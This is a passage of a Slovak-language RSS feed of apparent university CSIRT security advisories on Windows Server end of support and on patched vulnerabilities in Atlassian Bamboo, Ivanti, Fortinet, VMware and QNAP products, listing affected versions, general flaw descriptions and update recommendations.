<li>Windows Server 2012 R2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Oct 10, 2023</li>



<li>Windows Server 2012&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Oct 10, 2023</li>



<li>Windows Server 2008 R2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Jan 14, 2020</li>



<li>Windows Server 2008&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Jan 14, 2020</li>
</ul>



<p><strong>Windows Server 2008 a Windows Server 2008 R2 koniec podpory</strong></p>



<p>Spoločnosť Microsoft ukončila priamu podporu pre Windows Server 2008 a Windows Server 2008 R2 14. januára 2020. Ak nemôžete inovovať na novšiu verziu, budete musieť používať rozšírené aktualizácie zabezpečenia (ESU). Tretia z týchto aktualizácií zabezpečenia skončila 10. januára 2023. Ak chcete, aby bolo vaše prostredie aktuálne a zabezpečené, inovujte na najnovšiu verziu.</p>



<p>Existuje však možnosť 4. ESU na 1 rok, len pre Azure. Táto aktualizácia bola k dispozícii 11. januára 2023 a bude podporovaná do 9. januára 2024. Rozšírené aktualizácie zabezpečenia sú bezplatné, ak používate 2008 alebo 2008 R2 vo virtuálnych počítačoch Azure.</p>



<p><strong><em>Odporúčania</em></strong>:</p>



<ul>
<li>Inovovať aspoň na Windows Server 2019 alebo novšiu verziu</li>



<li>Aplikovať a používať ESU rozšírenie do 13. októbra 2026</li>



<li>Migrovať svoj Windows Server na UCS (University Cloud Services)</li>
</ul>



<p>Ako získať rozšírené aktualizácie zabezpečenia (ESU) pre Windows Server 2012 a &nbsp;Windows Server&nbsp; 2012 R2 nájdete na:&nbsp;<a href="https://learn.microsoft.com/sk-sk/windows-server/get-started/extended-security-updates-deploy">https://learn.microsoft.com/sk-sk/windows-server/get-started/extended-security-updates-deploy</a></p>



<p><strong><em>Zdroje:</em></strong></p>



<p><a href="https://learn.microsoft.com/en-us/lifecycle/announcements/windows-server-2012-r2-end-of-support">https://learn.microsoft.com/en-us/lifecycle/announcements/windows-server-2012-r2-end-of-support</a></p>



<p><a href="https://techcommunity.microsoft.com/t5/windows-server-news-and-best/three-options-to-prepare-for-windows-server-2012-r2-end-of/ba-p/3645211">https://techcommunity.microsoft.com/t5/windows-server-news-and-best/three-options-to-prepare-for-windows-server-2012-r2-end-of/ba-p/3645211</a></p>



<p><a href="https://techcommunity.microsoft.com/t5/windows-server-news-and-best/three-options-to-prepare-for-windows-server-2012-r2-end-of/ba-p/3645211">https://techcommunity.microsoft.com/t5/windows-server-news-and-best/three-options-to-prepare-for-windows-server-2012-r2-end-of/ba-p/3645211</a></p>



<p><a href="https://www.polyu.edu.hk/its/news-and-events/its-enewsletter/get-connected/2023-may/end-of-support-for-windows-server-2012-2012-r2/">https://www.polyu.edu.hk/its/news-and-events/its-enewsletter/get-connected/2023-may/end-of-support-for-windows-server-2012-2012-r2/</a></p>



<p><a href="https://corebts.com/blog/windows-server-2012-end-of-life-risks-options-next-steps/">https://corebts.com/blog/windows-server-2012-end-of-life-risks-options-next-steps/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/558/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v serveroch Atlassian</title>
		<link>/posts/556</link>
					<comments>/posts/556#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 25 Mar 2024 12:32:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[code injection]]></category>
		<guid isPermaLink="false">/?p=556</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>Atlassian vydal opravy pre viac ako dve desiatky bezpečnostných chýb vrátane kritickej chyby ovplyvňujúcej Bamboo Data Center a&#160;Server. Úspešné zneužitie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>
<p><strong>Atlassian vydal opravy pre viac ako dve desiatky bezpečnostných chýb vrátane kritickej chyby ovplyvňujúcej Bamboo Data Center a&nbsp;Server. Úspešné zneužitie umožňuje injektovanie škodlivých príkazov bez toho, aby bola potrebná interakcia používateľa.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Bamboo Data Center a Server 8.2.0-8.2.9, 9.0.0-9.0.4, 9.1.0-9.1.3, 9.2.0-9.2.11 (LTS), 9.3.0-9.3.6, 9.4.0-9.4.3, 9.5.0-9.5.1 a&nbsp;staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-1597 (CVSS skóre 10)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2024-1597 sa týka PostgreSQL JDBC Drivera a ovplyvňuje Bamboo Data Center a Server. Útočník môže vytvoriť škodlivý dotaz pomocou manipulácie číselných a&nbsp;reťazcových znakov v&nbsp;dotaze. </strong><strong>Úspešné zneužitie umožňuje neautentifikovanému </strong><strong>útočníkovi injektovať škodlivé príkazy zneužitím parametra PreferQueryMode=SIMPLE. To vedie k </strong><strong>obchádzaniu bezpečnostných mechanizmov</strong><strong> parametrizovaných dotazov a umožňuje tak útok </strong><strong>typu SQL Injection</strong><strong>.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Injektovanie kódu</strong></li>



<li><strong></strong><strong>Obchádzanie zabezpečenia</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na najnovšiu verziu, ak tak nemôžete urobiť, aktualizujte svoju inštanciu na jednu z uvedených podporovaných pevných verzií:</p>



<ul>
<li>9.5.0 &#8211; 9.5.1 <strong>na verziu:</strong> 9.6.0 (LTS) alebo 9.5.2</li>



<li>9.4.0 &#8211; 9.4.3 <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2 alebo 9.4.4</li>



<li>9.3.0 &#8211; 9.3.6 <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2 alebo 9.4.4</li>



<li>9.2.0 &#8211; 9.2.11 (LTS) <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)</li>



<li>9.1.0 &#8211; 9.1.3 <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)</li>



<li>9.0.0 &#8211; 9.0.4 <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2,9.4.4 alebo 9.2.12 (LTS)</li>



<li><strong></strong>8.2.0 &#8211; 8.2.9 <strong>na verziu:</strong> 9.6.0 (LTS), 9.5.2, 9.4.4 alebo 9.2.12 (LTS)<strong></strong></li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html">https://thehackernews.com/2024/03/atlassian-releases-fixes-for-over-2.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1597">https://nvd.nist.gov/vuln/detail/CVE-2024-1597</a></p>



<p><a href="https://jira.atlassian.com/browse/BAM-25716">https://jira.atlassian.com/browse/BAM-25716</a></p>



<p><a href="https://confluence.atlassian.com/security/security-bulletin-march-19-2024-1369444862.html">https://confluence.atlassian.com/security/security-bulletin-march-19-2024-1369444862.html</a></p>



<p><a href="https://socradar.io/critical-vulnerabilities-in-connectwise-screenconnect-postgresql-jdbc-and-vmware-eap-cve-2024-1597-cve-2024-22245/">https://socradar.io/critical-vulnerabilities-in-connectwise-screenconnect-postgresql-jdbc-and-vmware-eap-cve-2024-1597-cve-2024-22245/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/556/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ivanti opravila dve kritické zraniteľnosti</title>
		<link>/posts/554</link>
					<comments>/posts/554#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Mar 2024 13:10:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[execute commands]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=554</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala opravu dvoch kritických zraniteľností, CVE-2023-46808 a CVE-2023-41724, ktoré sa nachádzajú v nástroji Ivanti Standalone Sentry a Ivanti...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala opravu dvoch kritických zraniteľností, CVE-2023-46808 a CVE-2023-41724, ktoré sa nachádzajú v nástroji Ivanti Standalone Sentry a Ivanti Neurons for ITSM. Úspešné zneužitie umožňuje útočníkovi ľubovoľné vykonávanie príkazov. Chyby boli predmetom zneužitia troch kyberšpionážnych skupín napojených na Čínu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Standalone Sentry 9.17.0, 9.18.0,&nbsp;9.19.0 a staršie</li>



<li>Ivanti Neurons for ITSM 2023.1, 2023.2,&nbsp;2023.3, vrátane starších</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-46808 (CVSS skóre 9,9)</strong></p>



<p><strong>Spoločnosť Ivanti vydala opravu pre </strong><strong>kritickú zraniteľnosť</strong><strong> CVE-2023-46808, ktorá ovplyvňuje Ivanti Neurons for ITSM. Táto chyba umožňuje </strong><strong>vzdialenému autentifikovanému používateľovi zapisovať súbory na server ITSM, čo môže viesť k&nbsp;vykonávaniu príkazov.</strong></p>



<p><strong>CVE-2023-41724 (CVSS skóre 9,6)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2023-41724 sa nachádza v&nbsp;systéme Standalone Sentry. Úspešné zneužitie umožňuje </strong><strong>neautentifikovanému útočníkovi vykonávať ľubovoľné príkazy v&nbsp;operačnom systéme</strong><strong> v&nbsp;rámci tej istej fyzickej alebo logickej siete. Na chybu poukázali výskumníci z Centra kybernetickej bezpečnosti NATO.</strong></p>



<p><strong>Nedávno odhalené bezpečnostné chyby v softvéri Ivanti boli podľa spoločnosti Mandiant predmetom zneužitia najmenej troch rôznych kyberšpionážnych skupín napojených na Čínu.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Ľubovoľné vykonávanie príkazov</strong></li>



<li><strong></strong><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia:</p>



<ul>
<li>Standalone Sentry na verziu 9.17.1, 9.18.1 alebo 9.19.1</li>



<li>Ivanti Neurons for ITSM na verziu v2023.3, 2023.2 alebo 2023.1.</li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html">https://thehackernews.com/2024/03/ivanti-releases-urgent-fix-for-critical.html</a></p>



<p><a href="https://forums.ivanti.com/s/article/CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US">https://forums.ivanti.com/s/article/CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US</a></p>



<p><a href="https://www.helpnetsecurity.com/2024/03/20/cve-2023-41724-cve-2023-46808/">https://www.helpnetsecurity.com/2024/03/20/cve-2023-41724-cve-2023-46808/</a></p>



<p><a href="https://forums.ivanti.com/s/article/SA-CVE-2023-46808-Authenticated-Remote-File-Write-for-Ivanti-Neurons-for-ITSM?language=en_US">https://forums.ivanti.com/s/article/SA-CVE-2023-46808-Authenticated-Remote-File-Write-for-Ivanti-Neurons-for-ITSM?language=en_US</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/554/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Fortinet</title>
		<link>/posts/529</link>
					<comments>/posts/529#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Mar 2024 12:12:30 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Authorization bypasses]]></category>
		<category><![CDATA[Execute code]]></category>
		<guid isPermaLink="false">/?p=529</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/FORTIOS-1.jpeg" alt="" /></p>Spoločnosť Fortinet vydala varovanie pred viacerými kritickými a&#160;vysoko závažnými zraniteľnosťami v&#160;produktoch FortiClientEMS, FortiOS, FortiProxy a FortiManager. Kritické zraniteľnosti umožňujú útočníkovi...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/FORTIOS-1.jpeg" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala varovanie pred viacerými kritickými a&nbsp;vysoko závažnými zraniteľnosťami v&nbsp;produktoch FortiClientEMS, FortiOS, FortiProxy a FortiManager. Kritické zraniteľnosti umožňujú útočníkovi vykonávanie kódu alebo príkazov prostredníctvom špeciálne vytvorených paketov alebo HTTP požiadaviek. Vysoko závažné zraniteľnosti sa týkajú obchádzania autorizácie a&nbsp;vykonávania ľubovoľného kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiClientEMS 7.2.0 &#8211; 7.2.2&nbsp;&nbsp;</li>



<li>FortiClientEMS 7.0.0 &#8211; 7.0.10</li>



<li>FortiClientEMS 6.4 všetky verzie</li>



<li>FortiClientEMS 6.2 všetky verzie</li>



<li>FortiClientEMS 6.0 všetky verzie</li>



<li>FortiOS 7.4.0 &#8211; 7.4.1</li>



<li>FortiOS 7.2.0 &#8211; 7.2.5</li>



<li>FortiOS 7.0.0 – 7.0.12</li>



<li>FortiOS 6.4.0 &#8211; 6.4.14</li>



<li>FortiOS 6.2.0 &#8211; 6.2.15</li>



<li>FortiProxy 7.4.0</li>



<li>FortiProxy 7.2.0 &#8211; 7.2.6</li>



<li>FortiProxy 7.0.0 &#8211; 7.0.12</li>



<li>FortiProxy 2.0.0 &#8211; 2.0.13</li>



<li>FortiManager 7.4.0</li>



<li>FortiManager 7.2.0 &#8211; 7.2.3</li>



<li>FortiManager 7.0.0 &#8211; 7.0.10</li>



<li>FortiManager 6.4.0 &#8211; 6.4.13</li>



<li>FortiManager 6.2 všetky verzie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-48788 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2023-48788 sa nachádza v&nbsp;komponente DB2 Administration Server (DAS). Chyba sa týka </strong><strong>nesprávnej neutralizácie špeciálnych prvkov v&nbsp;príkaze sql</strong><strong>. Úspešné zneužitie umožňuje </strong><strong>neautentifikovanému útočníkovi vykonávanie kódu alebo príkazov prostredníctvom špeciálne vytvorených požiadaviek. </strong><strong>Zraniteľnosť si </strong><strong>nevyžaduje interakciu používateľa</strong><strong>.</strong></p>



<p><strong>CVE-2023-42789 (CVSS skóre 9,8) a CVE-2023-42790 (CVSS skóre 8,1)</strong></p>



<p><strong>Zraniteľnosti</strong><strong> CVE-2023-42789 a&nbsp;CVE-2023-42790 v&nbsp;systémoch FortiOS a FortiProxy </strong><strong>súvisia s&nbsp;pretečením zásobníka a&nbsp;zapisovania mimo povolené hodnoty pamäte</strong><strong>. Úspešné zneužitie </strong><strong>umožňuje útočníkovi spustiť ľubovoľný kód alebo príkazy prostredníctvom špeciálne vytvorených požiadaviek HTTP.</strong></p>



<p><strong>CVE-2023-47534 (CVSS skóre 9,6)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2023-47534 v systéme FortiClientEMS sa týka </strong><strong>nesprávnej neutralizácie prvkov vzorca v súbore CSV</strong><strong>. Úspešné zneužitie umožňuje vzdialenému neautentifikovanému útočníkovi </strong><strong>spustiť neoprávnený kód</strong><strong> alebo príkazy na administrátorskej stanici </strong><strong>prostredníctvom špeciálne vytvorených požiadaviek na server</strong><strong>.</strong></p>



<p><strong>CVE-2023-36554 (CVSS skóre 8,1)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť CVE-2023-36554 kontroly prístupu sa nachádza vo FortiWLM MEA (aplikácia rozšírenia správy) pre FortiManager a&nbsp;</strong><strong>umožňuje neautentifikovanému vzdialenému útočníkovi spustenie ľubovoľného kódu</strong><strong> alebo príkazov </strong><strong>pomocou špeciálne vytvorených požiadaviek</strong><strong>.</strong></p>



<p><strong>CVE-2024-23112 (CVSS skóre 8,0)</strong></p>



<p><strong>Chyba CVE-2024-23112 sa nachádza v&nbsp;systémoch FortiOS a&nbsp;ForitProxy SSLVPN a&nbsp;umožňuje </strong><strong>autentifikovanému útočníkovi získať prístup k&nbsp;záložke iného používateľa</strong><strong> pomocou manipulácie s&nbsp;URL adresou. Úspešné zneužitie </strong><strong>umožňuje obísť autorizáciu</strong><strong> prostredníctvom zraniteľnosti používateľského kľúča [CWE-639].</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Vykonávanie kódu</strong></li>



<li><strong></strong><strong>Obchádzanie autorizácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia:</strong></p>



<ul>
<li>FortiClientEMS 7.2.0 &#8211; 7.2.2 na verziu 7.2.3 </li>



<li>FortiClientEMS 7.0.0 &#8211; 7.0.10 na verziu 7.0.11</li>



<li>FortiClientEMS na verziu 6.4</li>



<li>FortiClientEMS na verziu 6.2</li>



<li>FortiClientEMS na verziu 6.0</li>



<li>FortiOS 7.4 na verziu FortiOS 7.4.2</li>



<li>FortiOS 7.2 na verziu FortiOS 7.2.7</li>



<li>FortiOS 7.0 na verziu FortiOS 7.0.14</li>



<li>FortiOS 6.4 na verziu FortiOS 6.4.15</li>



<li>FortiProxy 7.4 na verziu FortiProxy 7.4.3</li>



<li>FortiProxy 7.2 na verziu FortiProxy 7.2.9</li>



<li>FortiProxy 7.0 na verziu FortiProxy 7.0.15</li>



<li>FortiManager 7.4.0 na verziu 7.4.1</li>



<li>FortiManager 7.2.0 &#8211; 7.2.3 na verziu 7.2.4</li>



<li>FortiManager 7.0.0 &#8211; 7.0.10 na verziu 7.0.11</li>



<li>FortiManager 6.2 na verziu 6.4.14</li>
</ul>



<p><strong>Používateľom, ktorí nemôžu aktualizovať svoj systém, odporúčame pre zmiernenie zraniteľností CVE-2023-42789 a CVE-2023-42790 vybrať metódu overenia, ktorá nie je založená na formulári </strong><strong>(ntlm NTLM, basic Basic http, digest Digest HTTP, negotiate Negotiate, fsso Fortinet Single Sign-On (FSSO), rsso RADIUS Single Sign-On (RSSO), ssh-publickey Public key based SSH, cert Client certificate, saml SAML)</strong><strong>. Viac info <a href="https://www.fortiguard.com/psirt/FG-IR-23-328">tu</a>.</strong></p>



<p><strong>Pokiaľ nemôžete aktualizovať svoje zariadenie, na zmiernenie zraniteľnosti CVE-2024-23112 je možné vypnúť webový režim SSL VPN.</strong><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.fortiguard.com/psirt/FG-IR-23-390">https://www.fortiguard.com/psirt/FG-IR-23-390</a></li>



<li><a href="https://www.fortiguard.com/psirt/FG-IR-23-328">https://www.fortiguard.com/psirt/FG-IR-23-328</a></li>



<li><a href="https://www.fortiguard.com/psirt/FG-IR-24-013">https://www.fortiguard.com/psirt/FG-IR-24-013</a></li>



<li><a href="https://www.fortiguard.com/psirt/FG-IR-23-103">https://www.fortiguard.com/psirt/FG-IR-23-103</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47534">https://nvd.nist.gov/vuln/detail/CVE-2023-47534</a></li>



<li><a href="https://docs.fortinet.com/upgrade-tool/fortigate">https://docs.fortinet.com/upgrade-tool/fortigate</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-36554">https://nvd.nist.gov/vuln/detail/CVE-2023-36554</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23112">https://nvd.nist.gov/vuln/detail/CVE-2024-23112</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-42789">https://nvd.nist.gov/vuln/detail/CVE-2023-42789</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-42790">https://nvd.nist.gov/vuln/detail/CVE-2023-42790</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-rce-bug-in-endpoint-management-software/">https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-rce-bug-in-endpoint-management-software/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-48788">https://nvd.nist.gov/vuln/detail/CVE-2023-48788</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/529/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch VMware</title>
		<link>/posts/527</link>
					<comments>/posts/527#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Mar 2024 07:10:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Execute code]]></category>
		<guid isPermaLink="false">/?p=527</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť VMware vydala bezpečnostné aktualizácie na opravu kritických zraniteľností úniku zo sandboxu v produktoch VMware ESXi, Workstation, Fusion a Cloud...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť VMware vydala bezpečnostné aktualizácie na opravu kritických zraniteľností úniku zo sandboxu v produktoch VMware ESXi, Workstation, Fusion a Cloud Foundation. Úspešné zneužitie môže viesť k úniku z virtuálnych počítačov a&nbsp;umožniť útočníkom získať prístup k hostiteľskému operačnému systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong></strong><strong>VMware ESXi</strong></li>



<li><strong></strong><strong>VMware Workstation Pro / Player (Workstation)</strong></li>



<li><strong></strong><strong>VMware Fusion Pro / Fusion (Fusion)</strong></li>



<li><strong></strong><strong>VMware Cloud Foundation (Cloud Foundation)</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-22252 a CVE-2024-22253 (CVSS skóre 9,3)</strong></p>



<p><strong>Kritické zraniteľnosti CVE-2024-22252 a CVE-2024-22253 sa nachádzajú v&nbsp;ovládačoch XHCI a&nbsp;UHCI USB a umožňujú použiť dealokované miesto v&nbsp;pamäti. Úspešné zneužitie si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje vykonávanie kódu na hostiteľskom systéme v&nbsp;rámci procesu VMX.</strong></p>



<p><strong>CVE-2024-22254 (CVSS skóre 7,9)</strong></p>



<p><strong>Chyba CVE-2024-22254 sa týka softvéru VMware ESXi a&nbsp;umožňuje útočníkovi s&nbsp;právami procesu VMX zapisovať mimo povolené hodnoty pamäte, čo môže viesť k&nbsp;úniku zo sandboxu.</strong></p>



<p><strong>CVE-2024-22255 (CVSS skóre 7,1)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť ESXi, Workstation a&nbsp;Fusion, CVE-2024-22255 sa nachádza v&nbsp;ovládači UHCI USB a&nbsp;môže viesť k&nbsp;úniku informácií z&nbsp;procesu VMX. Útočník potrebuje administrátorské oprávnenia vo virtuálnom stroji.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong>Vykonávanie kódu<strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><a href="https://docs.vmware.com/en/VMware-vSphere/8.0/rn/vsphere-esxi-80u1d-release-notes/index.html">Bezodkladná aktualizácia</a><strong> ESXi na verziu ESXi80U2sb-23305545, ESXi80U1d-23299997, ESXi70U3p-23307199, Workstation na verziu 17.5.1 a&nbsp;Fusion na verziu 13.5.1.</strong></p>



<p><strong>VMware vydala opravy aj na staršie versie ESXi: 6.7U3u, 6.5U3v, VCF 3.x.</strong></p>



<p><strong>Ak nemôžete aktualizovať svoje zariadenia, VJ CSIRT odporúča pre zmiernenie problémov odstrániť radiče USB z virtuálnych počítačov podľa <a href="https://kb.vmware.com/s/article/96682">pokynov výrobcu</a>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-sandbox-escape-flaws-in-esxi-workstation-and-fusion/">https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-sandbox-escape-flaws-in-esxi-workstation-and-fusion/</a></p>



<p><a href="https://thehackernews.com/2024/03/vmware-issues-security-patches-for-esxi.html">https://thehackernews.com/2024/03/vmware-issues-security-patches-for-esxi.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22252">https://nvd.nist.gov/vuln/detail/CVE-2024-22252</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22253">https://nvd.nist.gov/vuln/detail/CVE-2024-22253</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22254">https://nvd.nist.gov/vuln/detail/CVE-2024-22254</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22255">https://nvd.nist.gov/vuln/detail/CVE-2024-22255</a></p>



<p><a href="https://www.vmware.com/security/advisories/VMSA-2024-0006.html">https://www.vmware.com/security/advisories/VMSA-2024-0006.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/527/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v produktoch NAS</title>
		<link>/posts/525</link>
					<comments>/posts/525#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Mar 2024 11:54:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[execute commands]]></category>
		<guid isPermaLink="false">/?p=525</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>Spoločnosť QNAP poukázala na bezpečnostné chyby vo svojich softvérových produktoch NAS vrátane QTS, QuTS hero, QuTScloud a myQNAPcloud, ktoré by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>
<p><strong>Spoločnosť QNAP poukázala na bezpečnostné chyby vo svojich softvérových produktoch NAS vrátane QTS, QuTS hero, QuTScloud a myQNAPcloud, ktoré by mohli autentifikovanému útočníkovi umožniť prístup k zariadeniam. Kritické zraniteľnosti umožňujú obídenie autentifikácie, injektovanie príkazov a&nbsp;injekciu SQL. Zraniteľnosti sa nachádzajú na viac ako 3 miliónoch zariadení, ktoré majú prístup na internet.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>QTS 5.1.x</li>



<li>QTS 4.5.x</li>



<li>QuTS hero h5.1.x</li>



<li>QuTS hero h4.5.x</li>



<li>QuTScloud c5.x</li>



